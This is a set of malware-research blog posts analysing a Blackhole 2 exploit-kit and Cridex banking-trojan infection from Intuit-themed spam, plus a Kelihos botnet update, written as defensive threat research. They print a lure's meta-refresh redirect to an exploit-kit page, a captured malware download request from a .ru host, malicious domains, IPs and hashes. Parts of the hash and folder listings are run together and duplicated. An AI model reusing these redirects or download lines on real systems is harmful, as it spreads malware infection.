Blackhole & Cridex: Season 2 Episode 1: Intuit Spam & SSL traffic analysis

October 4, 2012, 9:56 am

≫ Next: Common Exploit Kits 2012 Poster

≪ Previous: CVE-2012-4681 Java 7 0-Day vulnerability analysis

The other day, I received another spam email, this time supposedly from Intuit. Since I know that Blackhole2 is now directing to Bugat/Feodo/Cridex banking malware, I wanted to look more closely and see what might be new. The "Intuit" email looked like this, and similar text context is shown below:

Dear xxxxxxx,

Great News! Your order, QG673260, was shipped today (see details below) and will complete shortly. We hope that you will see that it suit your needs. If you requested multiple products, we may ship them in separate boxes (at no additional cost to you) to ensure the fastest possible delivery.

We will also inform you with the ability to track your parcels via the instructions below.

Thank you for your order.

ORDER DETAILSOrder #: QG673260Order Date: Sep 25, 2012

Item(s) Requested In Your Shipment

Shipping Date: October, 1 2012Ship Method: TNT
Estimated Delivery Date: October, 3 2012 - October 05, 2012

Tracking No.: 8178101777788272988726

The prolific Cutwail spambot sent the spam email with a lure URL of:

hxxp://ladavaz.info/components/com_ag_google_analytics2/croconfrm.html

This URL path construction has been used as a redirector to Blackhole exploit sites carried by the popular LinkedIn spam runs, as well as others. For example the following URLs have been used by Blackhole:

/components/com_ag_google_analytics2/croconfrm.html

/components/com_ag_google_analytics2/fdicsecup.html

/components/com_ag_google_analytics2/itordernote.html

/components/com_ag_google_analytics2/Link.html

/components/com_ag_google_analytics2/supreqfdic.html

My downloaded "croconfrm.html" contained the following:

</script><noscript><meta http-equiv="refresh" content="0; url=hxxp://art-london.net/detects/stones-instruction_think.php"></noscript>

Note: If you attempt to simply wget the php file from a Blackhole2 kit, you will most likely just receive back a harmless dummy file. BH2 needs a "referer", and only one request per IP address. In this case, a simple fetch of the php yielded this:

Note the difference when the link is followed via a fresh IP address, and tracked via an intercepting proxy:

I'll make this file available for download at the bottom of the post and leave the decoding as an exercise for the reader. In the meantime, the BH2 kit served up two exploits for me. The first was a PDF file with an MD5 hash of 2d0932026e5a4791ed6fac44df22f91c and vicheck.ca report seen here. The second file was a PE32 executable with MD5 hash value of 06c6544f554ea892e86b6c2cb6a1700c and the VirusTotal report here.

PDF file dropped from 'art-london.net'

executable file dropped from 'art-london.net'

Once my test system became infected, it did a DNS query for droppinleverpro.ru, which was offline. It then queried for tuningferrarisglamour.ru which succesfully resolved to 146.185.220.176

At that point, my infected host established an HTTPS connection with: hxxps://tuningferrarisglamour.ru/savestats/

DNS queries and beginning of SSL session.

Examining the traffic via Wireshark or similar will yield no joy as the traffic is SSL encrypted. However by using an intercepting proxy as I described in my post "Decoding malware SSL using Burp proxy", I was able to examine the traffic between my infected host and tuningferrarisglamour.ru. The first response off the server was very interesting as it contained a large number of references to financial institutions and login URLs, as well as injection code. This is a much larger list than I saw in my last Cridex analysis, plus the injection code was very comprehensive and again covered a large number of institutions. A snippet of the decoded SSL session is seen below:

SSL Server response

There were several additional POST requests to tuningferrarisglamour.ru where it appears that my host's process lists, cookies, bookmarks, form history, and shared objects were sent to the remote server.

A snippet of this decoded traffic is seen below:

SSL Traffic indicating POST of shared objects

At this point, a message window popped up on the host asking if "I was sure I wanted to navigate away from this page". Selecting "Yes" took me to legitimate Google.com.

Volatility

I suspended my infected virtual machine soon after the SSL traffic to tuningferrarisglamour.ru appeared to pause and decided to see what some quick Volatility analysis would yield.

Running 'psscan' against the suspended memory image yielded the output below:

'psscan' output

Note that there are several unusual processes, notably:

PID 1100 - KB00647877.exe - Terminated
PID 1800 - KB00647877.exe - Terminated
PID 1472 - POS4C.tmp - Terminated
PID 1220 - cmd.exe - Terminated

While 'cmd.exe' is not typically considered an unusual process, note the creation and exit times of this instance are identical, also the parent ID of this process is 1472, "POS4C.tmp".
Examining the network connections via 'connscan', we see the following:

Connections to remote hosts

Note that PID 1492, 'explorer.exe' showed an established connection to 146.185.220.176, which is what we noted earlier as being the IP address of tuningferrarisglamour.ru. PID 1492 also showed a connection to 4.27.18.126, which courtesy of Internet Systems Consortium (ISC) Passive DNS, is seen to be associated with the following domain names:

freestreams-cdn.alldigital.net.rncdn1.com
bc01.ajnm.me.c.itmdb.net
bc04.ajnm.me.c.itmdb.net
bc05.ajnm.me.c.itmdb.net
bc18.ajnm.me.c.itmdb.net
bc19.ajnm.me.c.itmdb.net
bc21.ajnm.me.c.itmdb.net
blogs.aljazeera.com.c.itmdb.net
l3.vip.g.xgslb.net
www.nps.gov.c.footprint6.net
www.usgs.gov.c.footprint6.net
fp4.www.usgs.gov.c.footprint6.net

I next dumped the VAD segments of PID 1492, 'explorer.exe' in order to examine anything associated with these domains and banking URLs. Running 'strings' on the dumped VAD segments and searching for 'tuningferrarisglamour.ru' allowed me to locate this string in "explorer.exe.2228418.0x00090000-0x0018ffff.dmp". I then ran 'strings' on that entire segment and was able to see the same banking URLS and injection scripts that I noted in the SSL stream.

Strings extracted from VAD segment of 'explorer.exe'

It's also interesting to learn if these domains appear in any other processes. The 'yarascan'plugin is excellent for string searching when you know what you are looking for. From the Volatility command reference: "This plugin can help you locate any sequence of bytes (like assembly instructions with wild cards), regular expressions, ANSI strings, or Unicode strings in user mode or kernel memory."

Running the 'yarascan' plugin against this memory image indicates that the "droppinleverpro.ru" domain string is also seen in PID 1056, 'svchost.exe'. I then dumped the VAD segments of this process for further analysis.

'yarascan' indicating string hit in 'svchost.exe'

Domains and IP addresses

There were a number of domains and IP addresses seen in this analysis. Again, courtesy of Internet Systems Consortium (ISC), trusty 'whois', and some other tools:

ladavaz.info
Domain ID:D45959608-LRMS
Domain Name:LADAVAZ.INFO
Created On:28-Mar-2012 20:08:39 UTC
Last Updated On:27-May-2012 20:39:14 UTC
Expiration Date:28-Mar-2013 20:08:39 UTC
Sponsoring Registrar:GoDaddy.com LLC (R171-LRMS
Name Server:NS1.EQVIA.COM
Name Server:NS2.EQVIA.COM
Name Server:MALINAKM.COM.UA

first seen2012-10-01 14:58:21 -0000
last seen2012-10-03 00:13:02 -0000
ladavaz.info.A192.102.6.55

----------------------------------------

art-london.net
Domain Name: ART-LONDON.NET
Registrar: ACTIVE REGISTRAR, INC.
Whois Server: whois.activeregistrar.com
Referral URL: http://www.activeregistrar.com
Name Server: NS1.ZIKULA-SUPPORT.COM
Name Server: NS2.ZIKULA-SUPPORT.COM
Status: ok
Updated Date: 27-sep-2012
Creation Date: 17-sep-2012
Expiration Date: 17-sep-2013

first seen2012-10-01 13:54:08 -0000
last seen2012-10-01 17:34:18 -0000
art-london.net.A203.91.113.6

first seen2012-10-01 17:35:22 -0000
last seen2012-10-01 21:48:53 -0000
art-london.net.A195.198.124.60

art-london.net was registered with an email address of 'windowclouse@hotmail.com'. Other domains registered with that address, and their detected activity include:

blackiceword.com - Zeus name server
compandclub.com - Zeus name server
penel-opessong.com
webgrafismo.net - blackhole exploit kit
demedes.net - Zeus name server
toppaudio.com - Zeus name server

----------------------------------------

droppinleverpro.ru
domain: DROPPINLEVERPRO.RU
nserver: ns1.2ns.info.
nserver: ns2.2ns.info.
nserver: ns3.2ns.info.
nserver: ns4.2ns.info.
state: REGISTERED, DELEGATED, VERIFIED
registrar: REGRU-REG-RIPN
created: 2012.09.07

first seen2012-09-16 16:35:07 -0000
last seen2012-09-29 11:20:07 -0000
droppinleverpro.ru.A146.185.220.35

----------------------------------------

tuningferrarisglamour.ru
domain: TUNINGFERRARISGLAMOUR.RU
nserver: ns1.2ns.info.
nserver: ns2.2ns.info.
nserver: ns3.2ns.info.
nserver: ns4.2ns.info.
state: REGISTERED, DELEGATED, VERIFIED
registrar: REGRU-REG-RIPN
created: 2012.09.29

first seen2012-09-29 15:33:13 -0000
last seen2012-10-02 05:56:28 -0000
tuningferrarisglamour.ru.A146.185.220.176

----------------------------------------

Also of note were domains seen in the webinject code or in the sections of the VAD segments. These domains were:

moogparadise.net
Domain Name: MOOGPARADISE.NET
Registrar: INTERNET.BS CORP.
Whois Server: whois.internet.bs
Referral URL: http://www.internet.bs
Name Server: NS-CANADA.TOPDNS.COM
Name Server: NS-UK.TOPDNS.COM
Name Server: NS-USA.TOPDNS.COM
Status: clientTransferProhibited
Updated Date: 07-sep-2012
Creation Date: 04-sep-2012
Expiration Date: 04-sep-2013

first seen2012-09-10 16:41:38 -0000
last seen2012-10-02 01:31:42 -0000
moogparadise.net.A91.220.35.69
moogparadise.net.NSns-uk.topdns.com.
moogparadise.net.NSns-usa.topdns.com.
moogparadise.net.NSns-canada.topdns.com.
moogparadise.net.NSns1.silentdns.com.

----------------------------------------

compositiontantalized.net
Domain Name: COMPOSITIONTANTALIZED.NET
Registrar: INTERNET.BS CORP.
Whois Server: whois.internet.bs
Referral URL: http://www.internet.bs
Name Server: NS1.BLACKHULK.BIZ
Name Server: NS2.BLACKHULK.BIZ
Status: clientTransferProhibited
Updated Date: 14-sep-2012
Creation Date: 14-sep-2012

first seen2012-10-01 16:32:22 -0000
last seen2012-10-01 21:10:23 -0000
compositiontantalized.net.A146.185.220.176
compositiontantalized.net.NSns1.monkeydns.net.
compositiontantalized.net.NSns2.monkeydns.net.

----------------------------------------

192.102.6.55 - HOSTVDS-NET - TOV HOST VDS - UA
203.91.113.6 - G-Mobile - G-Mobile, Baga-Toiruu 3/9, Chingeltei district-1 - MN
195.198.124.60 - SE-SMMIAB - Skand Meteorologi och Miljoinstr - SE
146.185.220.35 - mdsru-net - MDS LTD - RU
146.185.220.176 - mdsru-net -MDS LTD - RU
91.220.35.69 - ZAMANHOST-NET - Rusnak Vasil Viktorvich - RO

There is much more that can be analyzed in the both the memory image and in the dropped files. Correlation of these findings with other similar spam campaigns would also be interesting. The primary goal of this post was to examine the evolution of this banking malware, especially in light of the prolific Blackhole v2 exploit kit. For obvious reasons, I won't be posting all the webinject URLs, nor will I make the RAM dump publicly available. Notification processes are underway to the affected parties. I will provide any of the above discussed items in their entirety to qualified institutions. Feel free to email me if you want further information on anything discussed here.
-----------------------------------------------------------------------------------------------------------
The following link goes to a ZIP file containing several files associated with this post.

stones-instruction_think.php
Packet capture of infected host execution run.
Initial lure - croconfrm.html

A partial pack of Blackhole 2 is available for researchers for download via Contagio. The pack came from a server with open directories.

------------------------------------------------------------------------------------------------------------------------------

cridex_ssl.zip

↧

Common Exploit Kits 2012 Poster

November 11, 2012, 1:15 pm

≫ Next: Trojan Nap aka Kelihos/Hlux - Feb. 2013 Status Update

≪ Previous: Blackhole & Cridex: Season 2 Episode 1: Intuit Spam & SSL traffic analysis

Hurricane Sandy, Jersey Shore
Src. Twitter Oct 28,2012
author unknown

Update May 2013 Download any size of 2012 poster - now for free here

8900 x 6000 px = up to 40" x 60" (101 x 150 cm)

5340 x 3600 px = up to 24" x 35.6" (~ 61 x 91 cm)

3578 x 2415 px = up to 16" x 24" (~ 40 x 60 cm)

1720 x 1200 px = up to 11"x14" (~ 20 x 30 cm)

For current information and table listing of exploit packs please visit

Contagio: Overview of exploit packs

-----------------------------------------------------------------------------------------
The poster includes most common exploit packs of 2012. The poster will be updated and new issues posted in the future.

See Staten Island hurricane aftermath photos here:

Time.com NY Times

If you wish to use your own printing services and/or need multiple copies, you can request the poster file ( jpg 8900 x 6000 px printable to at least 60"x40" or 152cm x 101cm) in exchange for $25 minimum donation to the Hurricane Relief or a charity of your choice. Email us (admin at deependresearch.org) a receipt or proof of a donation done in the past month (you can partially hide/obscure your personal info, if needed) and we will email you the file.

You can request the poster file (see sizes below) in exchange for donation to the Hurricane Relief or a charity of your choice. Email us (admin at deependresearch.org) a receipt of a donation made in the past month (you can partially hide/obscure your personal info, if needed) and we will send you the file.
8900 x 6000 px = up to 40" x 60" (101 x 150 cm) = $25 Donate here or charity of your choice
5340 x 3600 px = up to 24" x 35.6" (~ 61 x 91 cm) = $15 Donate here or charity of your choice
3578 x 2415 px = up to 16" x 24" (~ 40 x 60 cm) = $10 Donate here or charity of your choice
1720 x 1200 px = up to 11"x14" (~ 20 x 30 cm) = Free Download

Copyright information:
All logos in the images of the fish are trademarks of Adobe Systems, Sun Microsystems, Apple, and Microsoft. The logos are used only for product comparison and academic research reasons that fall within "Fair use" and "Nominative Fair use" limits. If these companies have any concerns, their representatives can contact us via email.
See more here:
http://en.wikipedia.org/wiki/Nominative_use
http://en.wikipedia.org/wiki/Fair_use

↧

Trojan Nap aka Kelihos/Hlux - Feb. 2013 Status Update

February 10, 2013, 2:47 pm

≫ Next: Yara Resources

≪ Previous: Common Exploit Kits 2012 Poster

Update Feb 11, 2012 Regarding media headlines that it is a "new version":
Please note that this post is a "status update" on the growth of the Kelihos botnet. It is the same botnet and malware as we saw last year. The goal of the post is to highlight the rapid re-growth after the March 2012 takedown and share the recent known domain/name server data.

FireEye posted details about the sleep function found in Kelihos/Hlux (An encounter with Trojan Nap), which is interesting, and indeed is present in some of the samples we saw. The trojan, of course, has many more features, and most of them were documented in previous publications online. This post is a quick update on the state of Kelihos/Hlux botnet, along with the list of known fast flux domains (1500+) associated with with Kelihos distribution or Command&Control. (current > 2012). The current and most active name servers are pointing to the ns[1-6].boomsco.com, ns[1-6].larstor.com, and ns[1-6].zempakiv.ru which are also fast flux domains. The double fast flux nature of the botnet makes it very difficult to take down, and sinkholing is a temporary measure. Despite the two large attempts to take it down (Sep.2011 and Mar. 2012), the botnet is definitely on the rise again.

Previously published research about Kelihos

Feb. 2013 - An encounter with Trojan Nap - Fireeye

Feb. 2013 - Backdoor.Win32. Kelihos - Lavasoft Analysis

Jan. 2013 - Waledac Gets Cozy with Virut - Symantec (Symantec call Kelihos "Waledac (Kelihos)")

Jan. 2013 - Beware of Kelihos-2? - Portable Apps member note

Dec. 2012 - A Quick Update On Spambot Kelihos - abuse.ch

Mar. 2012 - Kelihos.B/Hlux.B botnet takedown - Honeynet Project

Mar. 2012 - Botnet Shutdown Success Story - again: Disabling the new Hlux/Kelihos Botnet - Securelist

Mar. 2012 - Kelihos: not Alien Resurrection, more Attack of the Clones - ESET

Mar. 2012 - FAQ: Disabling the new Hlux/Kelihos Botnet - Securelist

Mar. 2012 - Kelihos Back In Town Using Fast Flux - Abuse.ch
Feb. 2012 - Long life to Kelihos! - Websense / Gianluca Giuliani

Feb. 2012 - The where and why of HLUX - Securelist

Jan. 2012 - Kelihos/Hlux botnet returns with new techniques - Securelist

Sep. 2011 - Botnet Shutdown Success Story: How Kaspersky Lab Disabled the Hlux/Kelihos Botnet

Sep. 2011 - Microsoft Neutralizes Kelihos Botnet, Names Defendant in Case

Jan. 2011 - New P2P Botnet Arising - Securelist

Dec. 2010 - New Fast Flux Botnet for the Holidays: Could it be Storm Worm 3.0/Waledac 2.0? - Shadowserver

List of recent MD5 hashes (you can download this sample set from Contagio. There are 95 files).

01B43C0C8D620E8B88D846E4C9287CCD036ADB0D4B856C2A5E16175BD089FF2403F3B93A9B3D70D9BB9AD829A5F2361D0481B4B12C8C69B735CAC2A918B527900530898731D7165DBABBF6BF252BA77E08862142D7313A1D431D67E0E755EFC7093586512549F2D016AD4C70F4F8E5C80BF067750C7406CF3373525DD09C293C0C921935F0880B5C2161B3905F8A30690FEAAA4ADC31728E54B006AB9A7E6AFA15B6DFADD045E8282C4927F8BDD69D3E15B9C9632510FB4D387D4A02ABF830DD1B342E6682167571B55AB59F3DD38D1E1C04C6B4E0BBBC99CCEE489270C986221E08449CE5848B6ADFEE48B1582EAEEF
223D32E3F6BB9C5A6AD3CD58B898EFA1223F7E425BD28AE13A54B2D0017D1E8122AE2A6FF14C58265B5C79FBC25A91B62304FA9A6A67984CA0FF9E9BF561817A23585DCBA9DFD4719ECC20B2D662D98325B4C1C68C58D7D559E8682117D7C01F288E85A4A7756268EBDED1F356531E0328A417B0EA5BE796720463607F06CCC92B4A5F1C8225D9043AE1302DCCD7063B2F091B59382F6CA9E1233EE38B171B2E30EA180ECE416600DABC5ADA0F630D06352A8AB0D5C7DB40F865B0E7E03B1D9636C90E73120A419B4B00E66177040F433774D5BD50F4286531FEDF716D83FC6E396B88D48CC04A8C37F4409F65EA8A973A76AA2439112479635D7172DB2440B13B6A3354B71CD674D4BC27646D2705023D0F09DA5C5DBDB2124AEB0953F355B73D711B47C8FDE2C6A5E62D6AD0BA7BB544B342383E286465D74A838EE0780DDA49B6D19F9307C3BBA460C936ADE26B704B6DFE2A4B0EF515275AC84B378D5F6F4C2DB57ED5D27F54120765A9FA9C3BC751D3E04AF7E29A1E3A1748E03F0BD57856AD23082E5E73AAEB95E5A915DF54445ACA74320003576F79CF6EDD0629CC135B947FEAA5BFA951C94B11BB9EEA9BC35BA7D2DE0CCC58F104240610BF297E6E5BECB2498EA801ED010DD073007E20CE5FFE38CA9FE07394D1BC5C270E83B25363C926F659C3EDEC0B85C91898622A4D69170C0C9FB4EEC6A630C4C9182505F06AA100C459E854A9A334B10468EAD0146B873B6D21ECC9ADF7246D644B23FB846F6B016A5DB1791188D7C98A464292CC70FD6A11E482D756BEF27546AA11220672C1BEC266B23AF5CB12AE2F669D87847316D0EE9C0B6C23C7CEB2D04DC6B665766A50581F6E47FF94126C5DBBD9FB0176B7BB0CC2E3623078BF9E9A9A343CE177E2D2A1E508EA30D548293E2C36D64F787F39D70D2BEC3139A6EA7690B884647E1B91800F2FE9974C7BB18A7097D9337F7E0C58BDF1E47059DD84FFB301F6B78005E44761B842370D43299B29B0F16A80E595253D3E02071D2564BA8296D30884741D6DFFC996D35B8DC0A01111A5DE9010DD12A1419E0F0098FD10CA324E239424EB9DE0558193A6B4D9607C23CBD59C075FB471DC66394090C8BFAA4739A49CA42C5B352DEFB53F8D30C16B36697AA13B21423C5AE7BA318D0D26E672AD22A15F02836309B819DE10068ED49D5D87A56577564E52251C54B27D4CA62C266FA78BE2345E524515E0DD1CCCA3C524F9A8ABECD7C571AAEE6C964514133585F3A910A324394B56022C7AC10DB22EC3F6B1ABD1279A28F22B86A15D6DAFBC28A5B568CF0982C867CD499F953E43738511B63F25D5B02FE00D9423A7CCC0C3CCE2B66475ED30943C0056C9402DCAECB8B9BB5560123C62588988BC22C704CD9E03C06414E1994BF4EFA41911CA81099411C465888536A6785883079043F38143BDC98F3F5709292D6D97AD96C1A8459A81CAAFD0C9B5DC0DAB8D1A3C1D5AF9EE94CCA50DCB8A30B325BF10CED5DAE4D51ACE391D2B2036365D8943257FE1CB967ED4CBEABAE5B4D4BAF14F554C8E9A4E86DCE41A00FB703B6A6324CE4F4C4DB143DE5FDBAD9274B21EA5391F48441D33D8DEAF70F248599985FC32B083F16F251ADF1A932144BF2C6E50FD090FDC1F1408DFE01E12671BBDD7EC0F8BEBA08EC440E2F8F5C80566BF32E1841B3C5A669D42E453463A428A71A5DB19FC18807E747BEB17EB2F02FA871C005C569B3299FCBAEB4DBB18D00321A809A6C4D8594DDF5AF5A6FC81A4F5AE6DEBFAC463DD49E1C2F604C7E4EC3A12A83E0852A9D7FE75CAF96EBF8128BFC6965C73A2659718C663FE501F12B34701CF8AF5DD307C314862

List of files sorted by PE header Time Date stamp. It is not always indicative of age (and in this case all samples are recent -2013-2012) as the time stamp can be faked but can be helpful for finding variants.

1985-12
84741D6DFFC996D35B8DC0A01111A5DE

2009
23585DCBA9DFD4719ECC20B2D662D983
A78BE2345E524515E0DD1CCCA3C524F9

2010-01
03F3B93A9B3D70D9BB9AD829A5F2361D
787F39D70D2BEC3139A6EA7690B88464

2010-02
5B947FEAA5BFA951C94B11BB9EEA9BC3

2010-03
288E85A4A7756268EBDED1F356531E03

2010-04
0530898731D7165DBABBF6BF252BA77E
15B6DFADD045E8282C4927F8BDD69D3E

2010-05
B568CF0982C867CD499F953E43738511
C465888536A6785883079043F38143BD
CE391D2B2036365D8943257FE1CB967E

2010-06
036ADB0D4B856C2A5E16175BD089FF24
28A417B0EA5BE796720463607F06CCC9

2010-07
51D3E04AF7E29A1E3A1748E03F0BD578
70FD6A11E482D756BEF27546AA112206
76B7BB0CC2E3623078BF9E9A9A343CE1

2010-11
3D0F09DA5C5DBDB2124AEB0953F355B7

2010-12
0FEAAA4ADC31728E54B006AB9A7E6AFA

2011-01
9424EB9DE0558193A6B4D9607C23CBD5
DFE01E12671BBDD7EC0F8BEBA08EC440

2011-02
352A8AB0D5C7DB40F865B0E7E03B1D96
BB5560123C62588988BC22C704CD9E03

2011-04
D4CBEABAE5B4D4BAF14F554C8E9A4E86

2011-05
1E08449CE5848B6ADFEE48B1582EAEEF
B63F25D5B02FE00D9423A7CCC0C3CCE2
C98F3F5709292D6D97AD96C1A8459A81

2011-07
B66475ED30943C0056C9402DCAECB8B9

2011-08
7F7E0C58BDF1E47059DD84FFB301F6B7
DCE41A00FB703B6A6324CE4F4C4DB143
F604C7E4EC3A12A83E0852A9D7FE75CA

2011-09
396B88D48CC04A8C37F4409F65EA8A97
72C1BEC266B23AF5CB12AE2F669D8784
77E2D2A1E508EA30D548293E2C36D64F
9C075FB471DC66394090C8BFAA4739A4
C06414E1994BF4EFA41911CA81099411
DF1A932144BF2C6E50FD090FDC1F1408

2011-10
0C921935F0880B5C2161B3905F8A3069
3D711B47C8FDE2C6A5E62D6AD0BA7BB5
5ACA74320003576F79CF6EDD0629CC13

2011-11
2B4A5F1C8225D9043AE1302DCCD7063B
3774D5BD50F4286531FEDF716D83FC6E
5BA7D2DE0CCC58F104240610BF297E6E
9CA42C5B352DEFB53F8D30C16B36697A

2011-12
E2F8F5C80566BF32E1841B3C5A669D42

2012-01
F96EBF8128BFC6965C73A2659718C663

2012-02
6F6B016A5DB1791188D7C98A464292CC

2012-03
093586512549F2D016AD4C70F4F8E5C8

2012-04
80E595253D3E02071D2564BA8296D308

2012-06
08862142D7313A1D431D67E0E755EFC7
223D32E3F6BB9C5A6AD3CD58B898EFA1
5BECB2498EA801ED010DD073007E20CE
5FFE38CA9FE07394D1BC5C270E83B253
A910A324394B56022C7AC10DB22EC3F6

2012-07
3B6A3354B71CD674D4BC27646D270502
4C2DB57ED5D27F54120765A9FA9C3BC7

2012-08
2304FA9A6A67984CA0FF9E9BF561817A
7316D0EE9C0B6C23C7CEB2D04DC6B665
EB4DBB18D00321A809A6C4D8594DDF5A

2012-10
25B4C1C68C58D7D559E8682117D7C01F
63C926F659C3EDEC0B85C91898622A4D
6AA100C459E854A9A334B10468EAD014
8005E44761B842370D43299B29B0F16A
B1ABD1279A28F22B86A15D6DAFBC28A5
DEAF70F248599985FC32B083F16F251A

2012-11
766A50581F6E47FF94126C5DBBD9FB01

2012-12
01B43C0C8D620E8B88D846E4C9287CCD
15B9C9632510FB4D387D4A02ABF830DD
1B342E6682167571B55AB59F3DD38D1E
1C04C6B4E0BBBC99CCEE489270C98622
30EA180ECE416600DABC5ADA0F630D06
36C90E73120A419B4B00E66177040F43
3A76AA2439112479635D7172DB2440B1
44B342383E286465D74A838EE0780DDA
56AD23082E5E73AAEB95E5A915DF5444
69170C0C9FB4EEC6A630C4C9182505F0
6B873B6D21ECC9ADF7246D644B23FB84
7E1B91800F2FE9974C7BB18A7097D933
9010DD12A1419E0F0098FD10CA324E23
A15F02836309B819DE10068ED49D5D87
A56577564E52251C54B27D4CA62C266F
A8ABECD7C571AAEE6C964514133585F3
CAAFD0C9B5DC0DAB8D1A3C1D5AF9EE94
DE5FDBAD9274B21EA5391F48441D33D8
EB17EB2F02FA871C005C569B3299FCBA
F5A6FC81A4F5AE6DEBFAC463DD49E1C2

2013-01
0481B4B12C8C69B735CAC2A918B52790
223F7E425BD28AE13A54B2D0017D1E81
2F091B59382F6CA9E1233EE38B171B2E
49B6D19F9307C3BBA460C936ADE26B70
A13B21423C5AE7BA318D0D26E672AD22
CCA50DCB8A30B325BF10CED5DAE4D51A
E453463A428A71A5DB19FC18807E747B

ÀÄÄÄ2013-02
4B6DFE2A4B0EF515275AC84B378D5F6F

Folder PATH listing
Volume serial number is 40A1-15F9
C:\USERS\ADMIN\DESKTOP\ALL
³ log.txt
³
1985-12
84741D6DFFC996D35B8DC0A01111A5DE

2009
23585DCBA9DFD4719ECC20B2D662D983
A78BE2345E524515E0DD1CCCA3C524F9

2010-01
03F3B93A9B3D70D9BB9AD829A5F2361D
787F39D70D2BEC3139A6EA7690B88464

2010-02
5B947FEAA5BFA951C94B11BB9EEA9BC3

2010-03
288E85A4A7756268EBDED1F356531E03

2010-04
0530898731D7165DBABBF6BF252BA77E
15B6DFADD045E8282C4927F8BDD69D3E

2010-05
B568CF0982C867CD499F953E43738511
C465888536A6785883079043F38143BD
CE391D2B2036365D8943257FE1CB967E

2010-06
036ADB0D4B856C2A5E16175BD089FF24
28A417B0EA5BE796720463607F06CCC9

2010-07
51D3E04AF7E29A1E3A1748E03F0BD578
70FD6A11E482D756BEF27546AA112206
76B7BB0CC2E3623078BF9E9A9A343CE1

2010-11
3D0F09DA5C5DBDB2124AEB0953F355B7

2010-12
0FEAAA4ADC31728E54B006AB9A7E6AFA

2011-01
9424EB9DE0558193A6B4D9607C23CBD5
DFE01E12671BBDD7EC0F8BEBA08EC440

2011-02
352A8AB0D5C7DB40F865B0E7E03B1D96
BB5560123C62588988BC22C704CD9E03

2011-04
D4CBEABAE5B4D4BAF14F554C8E9A4E86

2011-05
1E08449CE5848B6ADFEE48B1582EAEEF
B63F25D5B02FE00D9423A7CCC0C3CCE2
C98F3F5709292D6D97AD96C1A8459A81

2011-07
B66475ED30943C0056C9402DCAECB8B9

2011-08
7F7E0C58BDF1E47059DD84FFB301F6B7
DCE41A00FB703B6A6324CE4F4C4DB143
F604C7E4EC3A12A83E0852A9D7FE75CA

2011-09
396B88D48CC04A8C37F4409F65EA8A97
72C1BEC266B23AF5CB12AE2F669D8784
77E2D2A1E508EA30D548293E2C36D64F
9C075FB471DC66394090C8BFAA4739A4
C06414E1994BF4EFA41911CA81099411
DF1A932144BF2C6E50FD090FDC1F1408

2011-10
0C921935F0880B5C2161B3905F8A3069
3D711B47C8FDE2C6A5E62D6AD0BA7BB5
5ACA74320003576F79CF6EDD0629CC13

2011-11
2B4A5F1C8225D9043AE1302DCCD7063B
3774D5BD50F4286531FEDF716D83FC6E
5BA7D2DE0CCC58F104240610BF297E6E
9CA42C5B352DEFB53F8D30C16B36697A

2011-12
E2F8F5C80566BF32E1841B3C5A669D42

2012-01
F96EBF8128BFC6965C73A2659718C663

2012-02
6F6B016A5DB1791188D7C98A464292CC

2012-03
093586512549F2D016AD4C70F4F8E5C8

2012-04
80E595253D3E02071D2564BA8296D308

2012-06
08862142D7313A1D431D67E0E755EFC7
223D32E3F6BB9C5A6AD3CD58B898EFA1
5BECB2498EA801ED010DD073007E20CE
5FFE38CA9FE07394D1BC5C270E83B253
A910A324394B56022C7AC10DB22EC3F6

2012-07
3B6A3354B71CD674D4BC27646D270502
4C2DB57ED5D27F54120765A9FA9C3BC7

2012-08
2304FA9A6A67984CA0FF9E9BF561817A
7316D0EE9C0B6C23C7CEB2D04DC6B665
EB4DBB18D00321A809A6C4D8594DDF5A

2012-10
25B4C1C68C58D7D559E8682117D7C01F
63C926F659C3EDEC0B85C91898622A4D
6AA100C459E854A9A334B10468EAD014
8005E44761B842370D43299B29B0F16A
B1ABD1279A28F22B86A15D6DAFBC28A5
DEAF70F248599985FC32B083F16F251A

2012-11
766A50581F6E47FF94126C5DBBD9FB01

2012-12
01B43C0C8D620E8B88D846E4C9287CCD
15B9C9632510FB4D387D4A02ABF830DD
1B342E6682167571B55AB59F3DD38D1E
1C04C6B4E0BBBC99CCEE489270C98622
30EA180ECE416600DABC5ADA0F630D06
36C90E73120A419B4B00E66177040F43
3A76AA2439112479635D7172DB2440B1
44B342383E286465D74A838EE0780DDA
56AD23082E5E73AAEB95E5A915DF5444
69170C0C9FB4EEC6A630C4C9182505F0
6B873B6D21ECC9ADF7246D644B23FB84
7E1B91800F2FE9974C7BB18A7097D933
9010DD12A1419E0F0098FD10CA324E23
A15F02836309B819DE10068ED49D5D87
A56577564E52251C54B27D4CA62C266F
A8ABECD7C571AAEE6C964514133585F3
CAAFD0C9B5DC0DAB8D1A3C1D5AF9EE94
DE5FDBAD9274B21EA5391F48441D33D8
EB17EB2F02FA871C005C569B3299FCBA
F5A6FC81A4F5AE6DEBFAC463DD49E1C2

2013-01
0481B4B12C8C69B735CAC2A918B52790
223F7E425BD28AE13A54B2D0017D1E81
2F091B59382F6CA9E1233EE38B171B2E
49B6D19F9307C3BBA460C936ADE26B70
A13B21423C5AE7BA318D0D26E672AD22
CCA50DCB8A30B325BF10CED5DAE4D51A
E453463A428A71A5DB19FC18807E747B

2013-02
4B6DFE2A4B0EF515275AC84B378D5F6F

09-2020
22AE2A6FF14C58265B5C79FBC25A91B6

Some of the domains we saw from the binaries above: (see the full list of associated domains below)
akpuxqaz.ru

apnifosa.ru
bugfivin.ru
cagremub.ru
diqnawug.ru
dufyhive.ru
jiwviqpa.ru
merwiqca.ru
wowrizep.ru

Traffic information

GET /instcod.exe HTTP/1.0
Host: wowrizep.ru

HTTP/1.1 200 Ok
Server: Apache
Content-Length: 785920
Content-Type: application/octet-stream
Last-Modified: .., 06 ... 2013 13:47:52 GMT
Accept-Ranges:
bytes
MZ......................@...................................|...........!..L.!..This program must be run under Win32Domains associated with Kelihos distribution and CnC

The http request is still incomplete in this example (as described here http://www.abuse.ch/?p=3658)

URL: http://wowrizep.ru/instcod.exe
TYPE: GET
UA: None
URL: http://jiwviqpa.ru/instcod.exe
TYPE: GET

wowrizep.ru

nserver: ns2.larstor.com. (other name servers listed below)nserver: ns3.larstor.com.nserver: ns4.larstor.com.nserver: ns5.larstor.com. nserver: ns6.larstor.com. state: REGISTERED, NOT DELEGATED, UNVERIFIED
person: Private Person
registrar: REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created: 2012.12.22
paid-till: 2013.12.22free-date: 2014.01.22

Over 6 hours one infected machine had communications with over 1550 peers (unique IPs). Traffic flow shown from our sandbox IP in San Francisco, CA

